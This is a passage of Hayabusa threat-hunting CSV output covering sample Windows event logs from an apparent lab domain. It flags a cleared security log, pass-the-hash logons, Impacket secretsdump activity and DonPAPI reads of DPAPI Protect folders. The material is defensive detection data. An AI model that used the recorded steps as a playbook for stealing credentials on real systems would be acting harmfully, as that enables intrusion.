| Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service 
Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | 
LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 
